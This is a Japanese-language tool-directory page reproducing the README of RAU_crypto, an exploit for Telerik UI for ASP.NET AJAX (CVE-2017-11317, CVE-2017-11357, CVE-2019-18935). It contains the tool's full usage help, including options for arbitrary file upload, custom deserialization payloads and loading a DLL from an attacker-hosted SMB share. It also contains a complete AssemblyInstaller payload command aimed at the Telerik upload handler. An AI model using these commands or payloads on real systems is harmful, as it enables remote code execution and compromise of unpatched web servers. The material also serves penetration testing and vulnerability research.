Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RAU_crypto — Telerik UI for ASP.NET AJAX ファイルアップロードと .NET 逆シリアル化エクスプロイト(CVE-2017-11317、CVE-2017-11357、CVE-2019-18935) | Kitploit
ツール/GitHubGitHub/bao7uo/rau_crypto
暗号化/復号化ツールペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubbao7uo/rau_crypto

RAU_crypto

Telerik UI for ASP.NET AJAX ファイルアップロードと .NET 逆シリアル化エクスプロイト(CVE-2017-11317、CVE-2017-11357、CVE-2019-18935)

リポジトリを見る
1805026年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RAU_crypto

Language

Telerik UI for ASP.NET AJAX 向けの複合エクスプロイトです。

  • CVE-2017-11317 および CVE-2017-11357 のファイルアップロード - ファイルを自動的にアップロードします
  • CVE-2019-18935 の .NET 逆シリアル化

攻撃者がホストする SMB サービスからリモートペイロードを取得するターゲットの能力をテストする機能にも対応しました。必要な前提条件が整っているかどうかをテストするには、Burp Collaborator や Responder を利用してください。

エクスプロイトが機能するには、通常、ハードコードされたキーを持つバージョンが必要か、または web.config の内容を開示できる場合など、キーを知っている必要があります。このエクスプロイトは、Telerik.Web.UI.WebResource.axd?type=rau で使用される rauPostData の復号と暗号化を直接行うこともできます。

要件

  • pycryptodome を同梱した python >= 3.6 (https://www.pycryptodome.org/en/latest/src/installation.html) - pip3 install pycryptodome または pip3 install pycryptodomex でインストール

exploit-db に掲載(旧バージョン)

  • https://www.exploit-db.com/exploits/43874/

関連項目

私の別の Telerik UI エクスプロイト(CVE-2017-9248 用)もおそらく興味を引くでしょう。こちらで入手できます:

  • https://github.com/bao7uo/dp_crypto

作業予定

  • 後期バージョンで欠落していた HMAC 機能。
  • カスタムキーを指定する機能。
  • mixed mode DLL を実行するためのコマンドライン引数(それまでの間は、以下に示す .NET 逆シリアル化ペイロードの例を使用してください)。
  • リモート(SMB)でホストされた mixed mode DLL の機能テストと読み込みのためのコマンドライン引数。
  • mixed mode DLL をテストするための独立したユーティリティ。
  • mixed mode DLL のソースコード/コンパイル手順の提供。
  • バージョンの総当たり。

注 - 最後の4項目は完了しているが公開されていません。

脆弱性

ファイルアップロード(CVE-2017-11317)の脆弱性は他の人によって発見され、@straight_blast @pwntester @olekmirosh に功績があると思います。発表直後、私は仕事の過程で Telerik ライブラリに遭遇したため、このライブラリと脆弱性を調査し、2017年7月にこのエクスプロイトを作成しました。また、関連する安全でない直接オブジェクト参照について CVE-2017-11357 を報告しました。

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

.NET 逆シリアル化 (CVE-2019-18935) の脆弱性は @mwulftange によって発見されました。

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

使用方法

root@kitploit:~
$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

例 - 復号

復号スクリーンショット

例 - 任意ファイルアップロード

アップロードスクリーンショット

カスタムペイロード (.NET 逆シリアル化)

.NET 逆シリアル化のカスタムペイロードの詳細については、この脆弱性を発見した @mwulftange による Code White ブログの素晴らしい記事を以下のリンクで参照してください。

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

更新 - このエクスプロイトの機能を取り入れた Caleb Gross @noperator による代替エクスプロイトがあります。すべてを説明する素晴らしいブログ記事もあります。また、RAU_Crypto への貢献について Caleb に感謝します。

  • https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

その他の関連リンク。

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

.NET 逆シリアル化ペイロードの例:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

mixed Mode DLL については、私の別の GitHub リポジトリを参照してください:

  • https://github.com/bao7uo/MixedUp

カスタムペイロード機能に影響を与えた @irsdl に特に感謝します。

リモート DLL 機能に影響を与えた @rwincey にクレジットを捧げます。

ツールをダウンロード